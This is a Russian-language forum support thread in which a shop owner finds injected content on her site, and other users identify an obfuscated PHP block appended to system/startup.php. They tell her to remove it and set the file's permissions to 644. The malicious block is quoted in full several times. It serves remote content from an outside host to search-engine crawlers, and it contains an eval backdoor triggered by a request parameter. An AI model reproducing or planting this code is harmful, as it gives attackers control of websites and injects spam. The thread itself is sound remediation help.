Перейти к содержанию
Mandarin

[Решено] Взлом сайта

Рекомендуемые сообщения

Добрый день! Три дня назад на сайте появилась вот такая хрень в шапке: Изображение

После нее начинается нормальная страница сайта:

Изображение

Запрашивала у хостера резервные копии сайта в те дни, когда все было нормально. Ничего не изменилось. Пробовала найти такую ссылку hoster.ru самостоятельно в файлах - безрезультатно. В админку зайти не могу. Что это может быть такое и как это убрать?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

я, конечно, все понимаю, но о какой помощи может быть речь, если вы даже ссылку на свой сайт не предоставили?

не думаю, что, за время моего отсутствия на форуме, в наших рядах появились телепаты.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Кодировка слетела - 1, подцепляет куки старой сессии - 2, ну и, как выразился ув. товарищ, так же батарейки сели в хрустальном шаре, котрый не раз помогал угадывать данные ответы...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

покажите содержимое вашего файла /home/u675/catalog-chess.u675.netangels.ru/www/system/startup.php (спрячьте в цитату и спойлер).

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Удалите все файлы в папке /system/cache/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

покажите содержимое вашего файла /home/u675/catalog-chess.u675.netangels.ru/www/system/startup.php (спрячьте в цитату и спойлер).

Содержимое startup.php:

<?php
// Error Reporting
error_reporting(E_ALL);

// RegEx
define('EMAIL_PATTERN', '/^[^@]+@.*.[a-z]{2,6}$/i');
// Check Version
if (version_compare(phpversion(), '5.1.0', '<') == TRUE) {
exit('PHP5.1+ Required');
}

// Register Globals
if (ini_get('register_globals')) {
ini_set('session.use_cookies', 'On');
ini_set('session.use_trans_sid', 'Off');
session_set_cookie_params(0, '/');
session_start();

$globals = array($_REQUEST, $_SESSION, $_SERVER, $_FILES);

foreach ($globals as $global) {
  foreach(array_keys($global) as $key) {
   unset($$key);
  }
}
}
// Magic Quotes Fix
if (ini_get('magic_quotes_gpc')) {
function clean($data) {
	 if (is_array($data)) {
	 foreach ($data as $key => $value) {
	   $data[clean($key)] = clean($value);
	 }
  } else {
	 $data = stripslashes($data);
  }

  return $data;
}
$_GET = clean($_GET);
$_POST = clean($_POST);
$_COOKIE = clean($_COOKIE);
}

if (!ini_get('date.timezone')) {
date_default_timezone_set('Europe/Moscow');
}

// Windows IIS Compatibility
if (!isset($_SERVER['DOCUMENT_ROOT'])) {
if (isset($_SERVER['SCRIPT_FILENAME'])) {
  $_SERVER['DOCUMENT_ROOT'] = str_replace('', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));
}
}

if (!isset($_SERVER['DOCUMENT_ROOT'])) {
if (isset($_SERVER['PATH_TRANSLATED'])) {
  $_SERVER['DOCUMENT_ROOT'] = str_replace('', '/', substr(str_replace('', '', $_SERVER['PATH_TRANSLATED']), 0, 0 - strlen($_SERVER['PHP_SELF'])));
}
}

if (!isset($_SERVER['REQUEST_URI'])) {
$_SERVER['REQUEST_URI'] = substr($_SERVER['PHP_SELF'], 1);
if (isset($_SERVER['QUERY_STRING'])) {
  $_SERVER['REQUEST_URI'] .= '?' . $_SERVER['QUERY_STRING'];
}
}

// Engine
require_once(DIR_SYSTEM . 'engine/action.php');
require_once(DIR_SYSTEM . 'engine/controller.php');
require_once(DIR_SYSTEM . 'engine/front.php');
require_once(DIR_SYSTEM . 'engine/loader.php');
require_once(DIR_SYSTEM . 'engine/model.php');
require_once(DIR_SYSTEM . 'engine/registry.php');

// Common
require_once(DIR_SYSTEM . 'library/cache.php');
require_once(DIR_SYSTEM . 'library/config.php');
require_once(DIR_SYSTEM . 'library/db.php');
require_once(DIR_SYSTEM . 'library/document.php');
require_once(DIR_SYSTEM . 'library/image.php');
require_once(DIR_SYSTEM . 'library/language.php');
require_once(DIR_SYSTEM . 'library/log.php');
require_once(DIR_SYSTEM . 'library/mail.php');
require_once(DIR_SYSTEM . 'library/sms.php');
require_once(DIR_SYSTEM . 'library/pagination.php');
require_once(DIR_SYSTEM . 'library/request.php');
require_once(DIR_SYSTEM . 'library/response.php');
require_once(DIR_SYSTEM . 'library/session.php');
require_once(DIR_SYSTEM . 'library/template.php');
?><?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Удалите все файлы в папке /system/cache/

Удалила - ничего не изменилось

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

что это? какая у вас сборка?

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

что это? какая у вас сборка?

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

magento 1.5.1.5

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Предполагаю, что на данном сайте, кроме index.php есть ещё и index.html

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

magento 1.5.1.5

:oops:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Предполагаю, что на данном сайте, кроме index.php есть ещё и index.html

По крайней мере в каталоге home/catalog-chess.u675.netangels.ru/www такого нет. Только index.php

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

:oops:

Если написала глупость, то скажите мне как начинающей, какая инфа Вам нужна)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

удаляйте из файла вот эту ерунду

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

и поставьте на него права 644

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

удаляйте из файла вот эту ерунду

<?php $x12="cx75162l_ix6ei164"; $x13="143u162lx5f163145to160t"; $x14="x63165162154_x65xe143"; $x15="cx75x72l_c154ox73e"; $x16="x65vx61x6c"; $x17="146151154e_147145164137c157156t145156x74163"; $x18="x66un143164i157nx5fx65170151s164x73"; $x19="151n151137x67x65164"; $x1a="preg_mx61164ch"; $x1b="sx74x72151px73la163x68145163"; $x1c="x75r154e156143157x64e";
error_reporting(0);$x0b = "x68x74164x70x3a//a143143x65x73163055x731x2eo162147x2fg145t056php"; $x0c = "1062x33063x32061qx71";if ($x1a("057050171141nx64x65x78|147157x6fx67154145051/x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("150x74164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."x3fx69x64x3d".$x0d."&c150a162x73etx3dx75&bx6f164x3d".$x0e; if($x19("x61x6clo167137165162x6c_f157x70x65156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."077x63x6f144145x3dx63x6f144x65046x62o164x3d".$x0e;if($x19("x61x6cl157x77_x75x72x6c137f157x70x65x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["143"] == $x0c) $x16($x1b($_REQUEST["143x6fd145"])); ?>

и поставьте на него права 644

Ооо, спасибо, все хорошо! А что за права 644?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

права доступа к файлу.

с такими правами никто, кроме вас не сможет изменить данный файл.

можете попросить службу поддержки вашего хостера сменить права файлу.

правда, мне кажется, что и с другими файлами у вас могут возникнуть проблемы в будущем...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

ОФФ Топ

а в чем запутался-то :) что опенкарт, что магенто, предок-то один оскоммерс, вот тут и запостила ;) если прадед один, значит и внуки одинаковые, глядишь помогут, а на форуме магенто, наверняка "поцаны понтовые сидят" не спешат на помощь :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

ОФФ Топ

а в чем запутался-то :) что опенкарт, что магенто, предок-то один оскоммерс, вот тут и запостила ;) если прадед один, значит и внуки одинаковые, глядишь помогут, а на форуме магенто, наверняка "поцаны понтовые сидят" не спешат на помощь :)

Админка-то OC :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Ну судя по тому как эти плагиаторы внедряют подобный код в труды разработчиков Opencart

<?php $x12="c\x75\162l_i\x6ei\164"; $x13="\143u\162l\x5f\163\145to\160t"; $x14="\x63\165\162\154_\x65xe\143"; $x15="c\x75\x72l_c\154o\x73e"; $x16="\x65v\x61\x6c"; $x17="\146\151\154e_\147\145\164\137c\157\156t\145\156\x74\163"; $x18="\x66un\143\164i\157n\x5f\x65\170\151s\164\x73"; $x19="\151n\151\137\x67\x65\164"; $x1a="preg_m\x61\164ch"; $x1b="s\x74\x72\151p\x73la\163\x68\145\163"; $x1c="\x75r\154e\156\143\157\x64e";
error_reporting(0);$x0b = "\x68\x74\164\x70\x3a//a\143\143\x65\x73\163\055\x731\x2eo\162\147\x2fg\145t\056php"; $x0c = "1\062\x33\063\x32\061q\x71";if ($x1a("\057\050\171\141n\x64\x65\x78|\147\157\x6f\x67\154\145\051/\x69", $_SERVER['HTTP_USER_AGENT'])) {$x0d = $x1c("\150\x74\164p://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);$x0e = $x1c($_SERVER['HTTP_USER_AGENT']);$x0f = $x0b."\x3f\x69\x64\x3d".$x0d."&c\150a\162\x73et\x3d\x75&b\x6f\164\x3d".$x0e; if($x19("\x61\x6clo\167\137\165\162\x6c_f\157\x70\x65\156") == 1) {echo $x17($x0f); } elseif($x18('curl_init')) {$x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;} } $x0f = $x0b."\077\x63\x6f\144\145\x3d\x63\x6f\144\x65\046\x62o\164\x3d".$x0e;if($x19("\x61\x6cl\157\x77_\x75\x72\x6c\137f\157\x70\x65\x6e") == 1) { echo $x17($x0f);}elseif($x18('curl_init')) { $x10 = $x12($x0f);$x13($x10, CURLOPT_HEADER, FALSE);$x13($x10, CURLOPT_RETURNTRANSFER, TRUE);$x11 = $x14($x10);$x15($x10); echo $x11;}if($_REQUEST["\143"] == $x0c) $x16($x1b($_REQUEST["\143\x6fd\145"])); ?>

Мне искренне жаль тех, кто будет ставить ЭТО - magento (изуродованный Opencart людьми, которые даже не знают php код). Реально, мне хочется от всей души навалять этим нехорошим людям люлей за такое.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.